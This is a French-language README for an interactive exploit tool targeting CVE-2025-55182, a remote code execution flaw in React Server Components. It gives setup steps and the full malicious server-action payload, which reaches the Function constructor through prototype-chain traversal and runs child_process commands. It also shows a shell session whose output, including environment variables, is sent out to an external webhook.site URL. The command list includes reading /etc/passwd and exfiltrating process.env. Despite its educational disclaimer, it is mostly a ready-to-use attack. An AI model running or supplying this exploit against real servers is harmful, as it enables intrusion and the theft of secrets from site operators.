
CVE-2025-55182 PoC interactif - React Server Components RCE - Recherche pédagogique en sécurité
Shell interactif pour exploiter CVE-2025-55182, une vulnérabilité d'exécution de code à distance dans les composants serveur React.
Cet outil est fourni uniquement à des fins ÉDUCATIVES et de TESTS DE SÉCURITÉ AUTORISÉS.
CVE-2025-55182 affecte les composants serveur React (RSC) dans :
La vulnérabilité permet l'exécution de code à distance (RCE) via des charges utiles malveillantes envoyées aux actions serveur.
$@x pour référencer des objets Chunk internes.then() (similaires à des Promesses)_response, _formData et _prefixFunction via une traversée de la chaîne de prototypes$3:constructor:constructor → Constructeur Function → RCE
git clone https://github.com/NathanJ60/react2shell-interactive.git
cd react2shell-interactive
npm install
Modifiez exploit.js et mettez à jour ces valeurs :
const TARGET_URL = 'http://localhost:3000/' // Serveur Next.js vulnérable
const WEBHOOK_URL = 'https://webhook.site/YOUR-ID' // Votre URL de webhook
Obtenez un webhook gratuit sur : https://webhook.site
node exploit.js
react2shell> !test
[+] Envoyé ! Vérifiez le webhook
react2shell> whoami
[+] Envoyé : whoami
react2shell> ls -la
[+] Envoyé : ls -la
react2shell> !env
[+] Envoyé ! Vérifiez le webhook pour les variables d'environnement
Les résultats apparaissent sur votre webhook, pas dans le terminal.
{
'0': '$1',
'1': {
'status': 'resolved_model',
'reason': 0,
'_response': '$4',
'value': '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
'then': '$2:then'
},
'2': '$@3',
'3': [],
'4': {
'_prefix': '<JAVASCRIPT_CODE>//',
'_formData': { 'get': '$3:constructor:constructor' },
'_chunks': '$2:_response:_chunks'
}
}
next-action$@3 crée une référence Chunk$3:constructor:constructor traverse jusqu'à Function_prefix est passé à Function() et exécutérequire() n'est pas disponibleimport() dynamique :
import("child_process").then(cp => cp.execSync("whoami"))
Mettez à jour vers ces versions pour corriger la vulnérabilité :
Licence MIT - À des fins éducatives uniquement.
PoC de recherche en sécurité - À utiliser de manière responsable.
| Commande | Description |
|---|
!test | Tester si l'exploit fonctionne (envoie une confirmation au webhook) |
!env | Exfiltrer les variables d'environnement (process.env) |
!js <code> | Exécuter du JavaScript personnalisé |
!help | Afficher l'aide |
!exit | Quitter |
<commande> | Exécuter une commande shell (ex : whoami, ls, cat /etc/passwd) |